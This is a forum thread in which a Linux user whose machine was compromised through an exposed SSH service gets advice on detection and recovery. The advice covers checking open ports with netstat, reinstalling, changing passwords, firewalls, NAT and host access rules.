I got hacked

[Leo]

Nice, thanks michaelcole. I think the iptables solution mentioned in the comments was the one I had heard about but I like this a lot, particularly the host lookup part.

 

Leo

[ianw1974]

I'd normally check using:

 

netstat -tan

 

for any open ports. This normally only listed TCP ports, so use:

 

netstat -na

 

to check for all including udp to see if anything is listening.

 

If you can't get in using your existing root password, you can boot from your Mandrake/Mandriva CD using rescue mode, and then mount and chroot your partitions and then reset the root password that way.

 

If your home directory is separate from the rest of the system, you can do a reinstall without formatting your home partition, thus saving having to move all your data about when installing. Just make sure the format option isn't selected for this partition if you do decide to reinstall.

[devries]

I think it´s better to wipe everything of the hds and start over. Who knows what´s left behind in /home. Take no chances. Just make a copy of your important data (music, films, documents. mail etcetc) and start again.

[iphitus]

I'd change your passwords too, there are some errant programs out there which store them in plain text in your home directory...

[Leo]

OK, so last night I checked .bash_history [ty Tyme] and it seems this chap (I was going to use another word beginning with 'c' but then remembered I am far too polite for that sort of shit) has been a busy little beaver. There were various downloads and installations mech-[something I can't remember] and some others which when I googled the filenames got mentioned in the same pages as root-kits. I also checked netstat and found 4 ports pointing to a similar ip address to the one that originally hacked me.

 

I checked the .bash_history of the root account and could not see any commands that were not mine but I guess this could have been altered.

 

Long story short I have reformatted all the partitions on the hd and started a reinstall (which I cocked up completely - it was late and I was annoyed). For good measure I reset my modem router to factory settings.

 

Lessons learnt:

use secure passwords

check logs

don't leave sshd running for anyone to use

check .bash_history and netstat before doing anything else.

use secure passwords

 

What have I missed?

Leo

[ianw1974]

Install shorewall or some other firewall to secure your machine. And restrict all ports, unless you really need them accessible from the outside. As michaelcole posted, you can use /etc/hosts.allow and /etc/hosts.deny to restrict access to various services, such as sshd. The denyhosts link he posted sounds really good to use in addition to restricting the service to specific users only.

 

I use a hardware firewall, and my router has NAT on it which isn't redirecting any ports to my internal IP address on my machine. Also make sure your router isn't natting any ports unless you need them accessible.

[Leo]

Thanks Ianw1974, I had a firewall on the machine last time (just didn't set it up right) and the host.allow host.deny stuff does look worthwhile doing.

 

The router has NAT but I don't know what this is or how it works (I will look it up) it also has a firewall on it (which was functioning as set but I must have set it up badly - more research).

 

On the upside, when this is over I should know more about security.

 

Any more comments/suggestions/further reading will be gratefully accepted

 

Leo

[ianw1974]

NAT is network address translation. It allows you to use a public IP address assigned by your ISP, to then redirect to a port running on your private IP addressed machines. This then negates the need to purchase public ip addresses for all your machines.

 

For example, I could have a public ip of 82.124.231.23 for example, and this would be what I attempt to connect to across the internet. I have port 80 for WWW redirecting to my machine using 192.168.1.2 for example with the use of NAT. All http requests for the public IP will be redirected to the internal IP address. I could then have port 22 for SSH redirecting to 192.168.1.3 which would be another machine. This means I only need one public IP.

 

My first router only had NAT and no firewall. NAT was enabled and kind of provides basic firewalling. I now use a hardware firewall as well, although if you do have a firewall on your router do enable this. As long as your not redirecting ports, and blocking all incoming connections, you should be secure enough. My default firewall rule is block all incoming but allow all outgoing, and usually is the default on most router/firewalls.

 

If you don't redirect any ports incoming to your machines, you shouldn't get anyone connecting to your machines. Unless of course, they hack your firewall/router and set them up themselves!

[devries]

Also enable security notification in the MCC.

 

 

Fill in your username, create a local email account (or fll in your email adress but it´s less safe because the email will be send unencrypted over the intrnet). You will get every day two mails: a security mail with opened ports, suspicioes files and if you install chrootkit a check if a rootkit is installed. And a diff mail with chances what ports have opened, what rpm packages got intalled.

[SilverSurfer60]

Some great advice is coming through this thread. Sorry you got hacked Leo, but I think you are doing a great job at bringing this to the attention of others, myself included. I am running a software firewall called smoothwall, I don't know if it really is that good, but I purchased an old desktop pc for £5 UKP and installed this free firewall on that. I have a network of 4 machines with one of those running a web server, email server and anything open to the internet. The other three machines are run on a secure network that cannot be accessed directly from the internet yet are able to access the internet. It's like having 2 firewalls really, one that stops all incoming traffic and allowing outgoing traffic, and another one that allows access to certain services. A web interface gives me administrator access to all the logs, port forwarding and stuff using https. It is a linux based OS so the root is only accessible using ssh and is secured by the hosts.allow method. I feel like I'm hiding in my castle but I also feel a little secure in there. I know full well if I peek over the top then I'm likely to get my head blown off, and so it is with computers and firewalls, you can limit the risks but if one connects to the internet then there is always some risk.

All the best in your resoration and hopefully you won't get hacked in the future.

[michaelcole]

I plugged a friends computer in brand new win XP into the internet and 20 Minutes later it was running like a dog..

 

Found it was fully attacked and spouting off attacking other computers on the internet..

 

At least with the linux we have a little longer to put in place the correct patches and updates and set up firewalls.

 

He had no chance took me 2 Days to get all the patches and config correct, since the viruses and other programs were using up all the bandwith..

 

This is a lesson to us all to check and recheck..

 

I reconfigured my Tripwire and Checked my firewall settings, just in case..

 

UPDATE - UPDATE - CHECK - CHECK...

[tyme]

on average, an unsecured windows xp machine put on the internet will be compromised in 15 minutes. it's sad, really.

[ffi]

Hi,

 

this might be a stupid question but what is ssh and how do I know if it´s running on my computer?

 

I´ve been on the net almost continuously with XP for 3 years and never had any problems, at least nothing my firewall and av couldn´t take care off.

 

I have a hardware firewall/nat router but need to have some ports forwarded, do I need some extra protection?

[ianw1974]

SSH is a service, more secure but works like telnet allowing you to connect to your machine remotely. Although it's far more than just telnet, you can transfer files using it too.

 

To check, look for port 22 being open on your machine. The command:

 

netstat -tan

 

should list your tcp ports and show port 22 if ssh is running. Or, check:

 

chkconfig --list sshd

 

if it doesn't list anything, sshd isn't installed. If it does, check to see if it says "on" against any of the runlevels.

[ffi]

Nothing running, but should I enable a firewall or is my router enough (it´s a fairly recent linksys, the firmware is OS and based on linux)?